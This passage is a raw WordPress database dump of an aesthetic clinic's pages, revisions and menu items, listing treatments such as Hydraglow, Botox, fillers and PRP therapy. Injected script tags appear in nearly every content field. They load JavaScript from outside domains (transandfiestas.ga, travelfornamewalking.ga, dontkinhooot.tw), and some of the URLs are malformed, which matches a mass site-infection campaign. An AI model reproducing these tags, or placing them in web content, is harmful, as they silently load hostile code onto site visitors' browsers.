type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6552','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6552',74,'nav_menu_item','',0),(6553,1,'2018-01-03 04:40:31','2018-01-03 04:40:31','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Wrinkle','','publish','closed','closed','','aesthetic-solutions-9-4','','','2018-01-03 04:40:31','2018-01-03 04:40:31','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6553',0,'page','',0),(6554,1,'2018-01-03 04:40:31','2018-01-03 04:40:31','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Wrinkle','','inherit','closed','closed','','6553-revision-v1','','','2018-01-03 04:40:31','2018-01-03 04:40:31','',6553,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6553-revision-v1/',0,'revision','',0),(6555,1,'2018-01-03 04:42:14','2018-01-03 04:42:14',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6555','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6555',75,'nav_menu_item','',0),(6556,1,'2018-01-03 04:42:52','2018-01-03 04:42:52','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Full Rejuvenation','','publish','closed','closed','','aesthetic-solutions-9-5','','','2018-01-03 04:42:52','2018-01-03 04:42:52','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6556',0,'page','',0),(6557,1,'2018-01-03 04:42:52','2018-01-03 04:42:52','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Full Rejuvenation','','inherit','closed','closed','','6556-revision-v1','','','2018-01-03 04:42:52','2018-01-03 04:42:52','',6556,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6556-revision-v1/',0,'revision','',0),(6558,1,'2018-01-03 04:43:23','2018-01-03 04:43:23',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6558','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6558',76,'nav_menu_item','',0),(6559,1,'2018-01-03 04:44:12','2018-01-03 04:44:12','<strong>HYDRAGLOW EAT REDUCTION</strong>\r\n<ol>\r\n 	<li>Heavy Cheeks</li>\r\n 	<li>Cheeks and Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Eat Reduction','','publish','closed','closed','','aesthetic-solutions-9-6','','','2018-01-03 04:44:12','2018-01-03 04:44:12','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6559',0,'page','',0),(6560,1,'2018-01-03 04:44:12','2018-01-03 04:44:12','<strong>HYDRAGLOW EAT REDUCTION</strong>\r\n<ol>\r\n 	<li>Heavy Cheeks</li>\r\n 	<li>Cheeks and Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Eat Reduction','','inherit','closed','closed','','6559-revision-v1','','','2018-01-03 04:44:12','2018-01-03 04:44:12','',6559,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6559-revision-v1/',0,'revision','',0),(6561,1,'2018-01-03 04:44:48','2018-01-03 04:44:48',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6561','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6561',77,'nav_menu_item','',0),(6562,1,'2018-01-03 04:45:37','2018-01-03 04:45:37','<strong>HYDRAGLOW HAIR</strong>\r\n<ol>\r\n 	<li>Hair Regrow</li>\r\n 	<li>Grey Hair Reverse</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Hair','','publish','closed','closed','','aesthetic-solutions-9-7','','','2018-01-03 04:45:37','2018-01-03 04:45:37','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6562',0,'page','',0),(6563,1,'2018-01-03 04:45:37','2018-01-03 04:45:37','<strong>HYDRAGLOW HAIR</strong>\r\n<ol>\r\n 	<li>Hair Regrow</li>\r\n 	<li>Grey Hair Reverse</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hydraglow Hair','','inherit','closed','closed','','6562-revision-v1','','','2018-01-03 04:45:37','2018-01-03 04:45:37','',6562,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6562-revision-v1/',0,'revision','',0),(6564,1,'2018-01-03 04:46:14','2018-01-03 04:46:14',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6564','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6564',78,'nav_menu_item','',0),(6565,1,'2018-01-03 04:46:59','2018-01-03 04:46:59','<strong>MELTING THREAD</strong>\r\n<ol>\r\n 	<li>Face</li>\r\n 	<li>Face and Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Melting Thread','','publish','closed','closed','','aesthetic-solutions-9-8','','','2018-01-03 04:46:59','2018-01-03 04:46:59','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6565',0,'page','',0),(6566,1,'2018-01-03 04:46:59','2018-01-03 04:46:59','<strong>MELTING THREAD</strong>\r\n<ol>\r\n 	<li>Face</li>\r\n 	<li>Face and Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Melting Thread','','inherit','closed','closed','','6565-revision-v1','','','2018-01-03 04:46:59','2018-01-03 04:46:59','',6565,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6565-revision-v1/',0,'revision','',0),(6567,1,'2018-01-03 04:47:30','2018-01-03 04:47:30',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6567','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6567',79,'nav_menu_item','',0),(6568,1,'2018-01-03 04:48:25','2018-01-03 04:48:25','<strong>HOOE KOREAN PEEL WITH MASK</strong>\r\n<ol>\r\n 	<li>Face</li>\r\n 	<li>Face and Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hooe Korean Peel With Mask','','publish','closed','closed','','aesthetic-solutions-9-9','','','2018-01-03 04:48:25','2018-01-03 04:48:25','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6568',0,'page','',0),(6569,1,'2018-01-03 04:48:25','2018-01-03 04:48:25','<strong>HOOE KOREAN PEEL WITH MASK</strong>\r\n<ol>\r\n 	<li>Face</li>\r\n 	<li>Face and Neck</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Hooe Korean Peel With Mask','','inherit','closed','closed','','6568-revision-v1','','','2018-01-03 04:48:25','2018-01-03 04:48:25','',6568,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6568-revision-v1/',0,'revision','',0),(6570,1,'2018-01-03 04:49:00','2018-01-03 04:49:00',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6570','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6570',80,'nav_menu_item','',0),(6571,1,'2018-01-03 04:49:52','2018-01-03 04:49:52','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Whitening Injection','','publish','closed','closed','','aesthetic-solutions-10-2','','','2018-01-03 04:49:52','2018-01-03 04:49:52','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6571',0,'page','',0),(6572,1,'2018-01-03 04:49:52','2018-01-03 04:49:52','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Whitening Injection','','inherit','closed','closed','','6571-revision-v1','','','2018-01-03 04:49:52','2018-01-03 04:49:52','',6571,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6571-revision-v1/',0,'revision','',0),(6573,1,'2018-01-03 04:50:27','2018-01-03 04:50:27',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6573','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6573',82,'nav_menu_item','',0),(6574,1,'2018-01-03 04:51:13','2018-01-03 04:51:13','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','White Plus Injection','','publish','closed','closed','','aesthetic-solutions-10-3','','','2018-01-03 04:51:26','2018-01-03 04:51:26','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6574',0,'page','',0),(6575,1,'2018-01-03 04:51:13','2018-01-03 04:51:13','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','White Plus Injections','','inherit','closed','closed','','6574-revision-v1','','','2018-01-03 04:51:13','2018-01-03 04:51:13','',6574,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6574-revision-v1/',0,'revision','',0),(6576,1,'2018-01-03 04:51:26','2018-01-03 04:51:26','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','White Plus Injection','','inherit','closed','closed','','6574-revision-v1','','','2018-01-03 04:51:26','2018-01-03 04:51:26','',6574,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6574-revision-v1/',0,'revision','',0),(6577,1,'2018-01-03 04:52:33','2018-01-03 04:52:33',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6577','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6577',83,'nav_menu_item','',0),(6578,1,'2018-01-03 04:53:15','2018-01-03 04:53:15','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Anti Aging Whitening','','publish','closed','closed','','aesthetic-solutions-10-4','','','2018-01-03 04:53:15','2018-01-03 04:53:15','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6578',0,'page','',0),(6579,1,'2018-01-03 04:53:15','2018-01-03 04:53:15','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Anti Aging Whitening','','inherit','closed','closed','','6578-revision-v1','','','2018-01-03 04:53:15','2018-01-03 04:53:15','',6578,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6578-revision-v1/',0,'revision','',0),(6580,1,'2018-01-03 04:53:48','2018-01-03 04:53:48',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6580','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6580',84,'nav_menu_item','',0),(6581,1,'2018-01-03 04:54:23','2018-01-03 04:54:23','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','PRP Therapy','','publish','closed','closed','','aesthetic-solutions-10-5','','','2018-01-03 04:54:23','2018-01-03 04:54:23','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6581',0,'page','',0),(6582,1,'2018-01-03 04:54:23','2018-01-03 04:54:23','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','PRP Therapy','','inherit','closed','closed','','6581-revision-v1','','','2018-01-03 04:54:23','2018-01-03 04:54:23','',6581,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6581-revision-v1/',0,'revision','',0),(6583,1,'2018-01-03 04:54:58','2018-01-03 04:54:58',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6583','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6583',85,'nav_menu_item','',0),(6584,1,'2018-01-03 04:55:42','2018-01-03 04:55:42','<strong>SCAR MESO ( PER AREA )</strong>\r\n<ol>\r\n 	<li>Small area</li>\r\n 	<li>Medium area</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Scar Meso (per area)','','publish','closed','closed','','aesthetic-solutions-10-6','','','2018-01-03 04:55:42','2018-01-03 04:55:42','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6584',0,'page','',0),(6585,1,'2018-01-03 04:55:42','2018-01-03 04:55:42','<strong>SCAR MESO ( PER AREA )</strong>\r\n<ol>\r\n 	<li>Small area</li>\r\n 	<li>Medium area</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Scar Meso (per area)','','inherit','closed','closed','','6584-revision-v1','','','2018-01-03 04:55:42','2018-01-03 04:55:42','',6584,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6584-revision-v1/',0,'revision','',0),(6586,1,'2018-01-03 04:56:06','2018-01-03 04:56:06',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6586','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6586',86,'nav_menu_item','',0),(6587,1,'2018-01-03 04:56:53','2018-01-03 04:56:53','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Vit C Injection (per area)','','publish','closed','closed','','aesthetic-solutions-10-7','','','2018-01-03 04:56:53','2018-01-03 04:56:53','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6587',0,'page','',0),(6588,1,'2018-01-03 04:56:53','2018-01-03 04:56:53','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Vit C Injection (per area)','','inherit','closed','closed','','6587-revision-v1','','','2018-01-03 04:56:53','2018-01-03 04:56:53','',6587,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6587-revision-v1/',0,'revision','',0),(6589,1,'2018-01-03 04:57:24','2018-01-03 04:57:24',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6589','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6589',87,'nav_menu_item','',0),(6590,1,'2018-01-03 04:58:29','2018-01-03 04:58:29','<strong>FACE MESO SLIMMING</strong>\r\n<ol>\r\n 	<li>Cheeks</li>\r\n 	<li>Double Chin</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Face Meso Slimming','','publish','closed','closed','','aesthetic-solutions-10-8','','','2018-01-03 04:58:29','2018-01-03 04:58:29','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6590',0,'page','',0),(6591,1,'2018-01-03 04:58:29','2018-01-03 04:58:29','<strong>FACE MESO SLIMMING</strong>\r\n<ol>\r\n 	<li>Cheeks</li>\r\n 	<li>Double Chin</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Face Meso Slimming','','inherit','closed','closed','','6590-revision-v1','','','2018-01-03 04:58:29','2018-01-03 04:58:29','',6590,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6590-revision-v1/',0,'revision','',0),(6592,1,'2018-01-03 04:58:56','2018-01-03 04:58:56',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6592','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6592',88,'nav_menu_item','',0),(6593,1,'2018-01-03 04:59:39','2018-01-03 04:59:39','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Body Meso Slimming','','publish','closed','closed','','aesthetic-solutions-10-9','','','2018-01-03 04:59:39','2018-01-03 04:59:39','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6593',0,'page','',0),(6594,1,'2018-01-03 04:59:39','2018-01-03 04:59:39','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Body Meso Slimming','','inherit','closed','closed','','6593-revision-v1','','','2018-01-03 04:59:39','2018-01-03 04:59:39','',6593,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6593-revision-v1/',0,'revision','',0),(6595,1,'2018-01-03 05:00:21','2018-01-03 05:00:21',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6595','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6595',89,'nav_menu_item','',0),(6596,1,'2018-01-03 05:01:11','2018-01-03 05:01:11','<strong>BOTOX</strong>\r\n<ol>\r\n 	<li>Upper Face ( Forehead / Eyebrow / Glabella )</li>\r\n 	<li>Eye ( Crows Feet )</li>\r\n 	<li>Lower Face ( Masseter / Jawline / Marionette)</li>\r\n 	<li>Neck / Double Chin</li>\r\n 	<li>Whole Face / Hyperhidrosis</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Botox','','publish','closed','closed','','aesthetic-solutions-11-2','','','2018-01-03 05:01:11','2018-01-03 05:01:11','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6596',0,'page','',0),(6597,1,'2018-01-03 05:01:11','2018-01-03 05:01:11','<strong>BOTOX</strong>\r\n<ol>\r\n 	<li>Upper Face ( Forehead / Eyebrow / Glabella )</li>\r\n 	<li>Eye ( Crows Feet )</li>\r\n 	<li>Lower Face ( Masseter / Jawline / Marionette)</li>\r\n 	<li>Neck / Double Chin</li>\r\n 	<li>Whole Face / Hyperhidrosis</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Botox','','inherit','closed','closed','','6596-revision-v1','','','2018-01-03 05:01:11','2018-01-03 05:01:11','',6596,'http://sandbox.futuremediatrix.com/medikpro/2018/01/03/6596-revision-v1/',0,'revision','',0),(6598,1,'2018-01-03 05:01:39','2018-01-03 05:01:39',' <script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','','','publish','closed','closed','','6598','','','2018-01-03 05:04:19','2018-01-03 05:04:19','',0,'http://sandbox.futuremediatrix.com/medikpro/?p=6598',91,'nav_menu_item','',0),(6599,1,'2018-01-03 05:02:24','2018-01-03 05:02:24','<ol>\r\n 	<li>Eye ( Sunken eye / tear thought mild )</li>\r\n 	<li>Hydrate Skin</li>\r\n 	<li>Smiling Line / nose / chin / cheek / lips</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Filler','','publish','closed','closed','','aesthetic-solutions-11-3','','','2018-01-03 05:02:24','2018-01-03 05:02:24','',0,'http://sandbox.futuremediatrix.com/medikpro/?page_id=6599',0,'page','',0),(6600,1,'2018-01-03 05:02:24','2018-01-03 05:02:24','<ol>\r\n 	<li>Eye ( Sunken eye / tear thought mild )</li>\r\n 	<li>Hydrate Skin</li>\r\n 	<li>Smiling Line / nose / chin / cheek / lips</li>\r\n</ol><script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Filler','','inherit','closed','closed','','6599-revision-v1','','','2018-01-03 05:02:24','2018-01-03 